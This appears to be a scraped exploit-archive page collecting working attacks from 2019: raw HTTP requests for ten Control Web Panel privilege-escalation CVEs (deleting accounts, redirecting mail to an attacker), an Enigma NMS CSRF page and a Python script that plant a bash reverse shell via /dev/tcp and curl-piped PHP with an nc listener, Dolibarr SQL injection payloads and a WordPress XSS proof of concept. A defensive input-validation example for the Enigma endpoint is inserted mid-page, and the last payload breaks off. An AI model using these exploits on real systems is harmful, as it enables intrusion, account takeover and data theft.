def zone_identifier_check(args):

    global ROOTDIR, internet_sin_cnt
    zone_set.update(found_set)

    for c in found_set:
        c = c + ZONE_IDENTIFIER
        res = access(ROOTDIR+args.user+"/"+c)
        if res == "Access is denied.":
            internet_sin_cnt += 1
            print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
            zone_set.add(c)


def ntsins(path,args,i):
    if i.rfind(".")==-1:
        search_missing_ext(path,args,i)
        i=""
    for x in path:
        if i != "":
            if args.built_in_ext:
                for e in EXTS:
                    res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
                    echo_results(args, res, x, i+e)
            elif args.specific_ext:
                idx = i.rfind(".")
                if idx == -1:
                    i = i + "."
                else:
                    i = i[:idx] + args.specific_ext
            res = access(ROOTDIR+args.user+"/"+x+"/"+i)
            echo_results(args, res, x, i)


def search(args):
    print "\tSearching...\n"
    global ROOTDIR, USER_DIRS, ARTIFACTS_SET

    if args.artifact:
        ARTIFACTS_SET = set([args.artifact])

    for i in ARTIFACTS_SET:
        idx = i.rfind(".") + 1
        if idx and args.built_in_ext:
            i = i[:idx -1:None]
        if len(i) > 0 and i != None:
            if valid_artifact_name(i,args):
                #specific user dir search
                if args.directory:
                    single_dir=[args.directory]
                    ntsins(single_dir,args,i)
                #search appdata dirs
                elif args.appdata:
                    ntsins(APPDATA_DIR,args,i)
                #all default user dirs
                else:
                    ntsins(USER_DIRS,args,i)


def check_dir_input(_dir):
    if len(re.findall(r":", _dir)) != 0:
        print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
        return False
    return True


def main(args):

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    if args.examples:
        usage()
        exit()

    if not args.user:
        print "[!] No target user specified see Help -h"
        exit()

    if args.appdata and args.directory:
        print "[!] Multiple search directories supplied see Help -h"
        exit()

    if args.specific_ext:
        if "." not in args.specific_ext:
            print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
            exit()

    if args.artifact and args.artifacts_from_file:
        print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
        exit()

    if args.built_in_ext and args.specific_ext:
        print "\t[!] Both specific and built-in extensions supplied, use only one."
        exit()

    if args.specific_ext and not args.artifacts_from_file:
        print "\t[!] -x to be used with -f flag only see Help -h."
        exit()

    if args.artifact:
        if args.artifact.rfind(".")==-1:
            print "\t[!] Artifacts must contain a .ext or will result in false positives."
            exit()

    if args.directory:
        if not check_dir_input(args.directory):
            exit()

    if args.artifacts_from_file:
        artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)

    if not args.artifact and not args.artifacts_from_file:
        print "[!] Exiting, no artifacts supplied see Help -h"
        exit()
    else:
        search(args)

    if sin_cnt >= 1 and args.zone_identifier:
        zone_identifier_check(args)

    if args.save and len(found_set) != 0 and not args.zone_identifier:
        save()
    else:
        if len(zone_set) != 0:
            found_set.update(zone_set)
            save()

    print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"

    if args.zone_identifier and internet_sin_cnt >= 1:
        print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"

    if not args.notfound:
        print "\tuse -n to display unfound enumerated files."
    if not args.built_in_ext:
        print "\tfor extra search coverage try -b flag or targeted artifact search -a."

if __name__ == "__main__":
    print BANNER
    parser = argparse.ArgumentParser()
    main(parse_args())


Control Web Panel 0.9.8.851 Privilege Escalation

Control Web Panel version 0.9.8.851 suffers from multiple privilege escalation vulnerabilities.


MD5 | 6f60d66e3e8d2b75a2b81b0d30d6bc25

CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for latest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=paserrecord HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=addregdns HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>

Optimization Method For The Exploitation Times Of Blind SQL Injections

Enigma NMS 65.0.0 Cross Site Request Forgery


Enigma NMS version 65.0.0 suffers from a cross site request forgery vulnerability.


MD5 | 11937f653b00d909ce14775f18a5541b

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16068 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma CSRF by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.

<html>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
xhr.withCredentials = true;

var body = "-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"system_upgrade\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"action_aux\"\r\n" +
"\r\n" +
"upload_file_complete\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" +
"\n" +
"?\x3e\n" +
"\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"upfile_name\"\r\n" +
"\r\n" +
"evil.php\r\n" +
"-----------------------------208051173310446317141640314495--\r\n";

var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
</script>
<body onload="submitRequest();">
</body>
</html>


Dolibarr ERP-CRM 10.0.1 SQL Injection


Dolibarr ERP-CRM version 10.0.1 suffers from a remote SQL injection vulnerability.


MD5 | f12651030a096cade2e287dc096ca300

# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business...
==================================================================


elemid (POST) - Sql injection PoC


POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]



Parameter: elemid (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
(ELT(7549=7549,1))),0x7176787a71))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

Enigma NMS 65.0.0 OS Command Injection


Enigma NMS version 65.0.0 suffers from a remote OS command injection vulnerability.


MD5 | cb9490e65d6ae7d4cf329d9229e1b379

#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection #
# NETSAS Pty Ltd Enigma NMS #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16072 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')

print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")

enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..."

# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
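
A defensive counterpart to the request built above, as an added example that is not part of the original advisory or of Enigma NMS: it validates the `snmp_browser` query parameters before anything reaches a process launch, and rejects the pipe-bearing `ip_address` value. The function and constant names, the accepted character sets, the IPv4-only restriction and the use of net-snmp's `snmpwalk` are assumptions; the page does not show how the CGI invokes SNMP.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs

# Constructed sample inputs (documentation-range addresses, not from the page).
BENIGN_QUERY = (
    "action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=192.0.2.20"
    "&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1"
    "&snmp_version=1"
)
# Same shape as the request the script above builds: shell pipes in ip_address.
INJECTION_QUERY = (
    "action=snmp_browser&hst_id=none&snmpv3_profile_id="
    "&ip_address=|curl%20192.0.2.10:8000/evil.php|php"
    "&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1"
    "&snmp_version=1"
)

# Numeric OID such as .1.3.6.1.2.1.1 (leading dot optional).
OID_RE = re.compile(r"\.?\d+(?:\.\d+)*")
# Conservative community-string alphabet (assumption for this example).
COMMUNITY_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")
ALLOWED_VERSIONS = {"1", "2c"}


class RejectedParameter(ValueError):
    """A request parameter failed validation; nothing was executed."""


def one_value(params, name):
    """Return the single value of a parameter; duplicates or absence are errors."""
    values = params.get(name, [])
    if len(values) != 1:
        raise RejectedParameter(name + ": expected exactly one value")
    return values[0]


def build_snmpwalk_argv(query_string):
    """Validate the snmp_browser parameters and return an argv list.

    Every value is checked against an allow-list for its type, so shell
    metacharacters (| ; ` $ and whitespace) can never appear in the result.
    """
    params = parse_qs(query_string, keep_blank_values=True)

    raw_ip = one_value(params, "ip_address")
    try:
        # IPv4 literals only in this example; host names are not resolved.
        ip = ipaddress.IPv4Address(raw_ip)
    except ValueError:
        raise RejectedParameter("ip_address: not an IPv4 address literal") from None

    version = one_value(params, "snmp_version")
    if version not in ALLOWED_VERSIONS:
        raise RejectedParameter("snmp_version: unsupported value")

    community = one_value(params, "snmp_ro_string")
    if not COMMUNITY_RE.fullmatch(community):
        raise RejectedParameter("snmp_ro_string: unexpected characters")

    oid = one_value(params, "mib_oid_manual")
    if len(oid) > 128 or not OID_RE.fullmatch(oid):
        raise RejectedParameter("mib_oid_manual: not a numeric OID")

    return ["snmpwalk", "-v", version, "-c", community, str(ip), oid]


def run_walk(query_string, timeout=10):
    """Run the walk with an argv list and no shell, so no shell parses request data."""
    argv = build_snmpwalk_argv(query_string)
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False)


if __name__ == "__main__":
    print(build_snmpwalk_argv(BENIGN_QUERY))
    try:
        build_snmpwalk_argv(INJECTION_QUERY)
    except RejectedParameter as exc:
        print("rejected:", exc)
```

Validation alone is not the whole fix: the argv-list launch in `run_walk` is what removes the shell from the path, so both parts belong together.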

WordPress Sell Downloads 1.0.86 Cross Site Scripting


WordPress Sell Downloads plugin version 1.0.86 suffers from a cross site scripting vulnerability.


MD5 | 557b7213297de113fd7fd1541e5e7818

# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: September 09,2019
# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
# Software Link : https://wordpress.org/plugins/sell-downloads/
# Tested Version: 1.0.86
# Tested on: Parrot OS, Wordpress 5.1.1


# PoC:
1- Go to "Products for Sale" section
2- Click on "Add New"
3- In the opened window click on "Add Comment"
4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
5- Click on "Publish" (or "Update" if you are editing an existing product)
6- You will see a pop-up (also if you click on the input). If you go to the product link, you will also see the pop-up.

Dolibarr ERP-CRM 10.0.1 SQL Injection


Dolibarr ERP-CRM version 10.0.1 suffers from a remote SQL injection vulnerability.


MD5 | 651b98a10f6da22baa060c0ef8e1faff

# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business...
==================================================================


actioncode (POST) - Sql injection PoC

http request:

POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
Content-Type: application/x-www-form-urlencoded
Content-Length: 610
Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save



Parameter: actioncode (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload:
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
0x28 END))--
HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
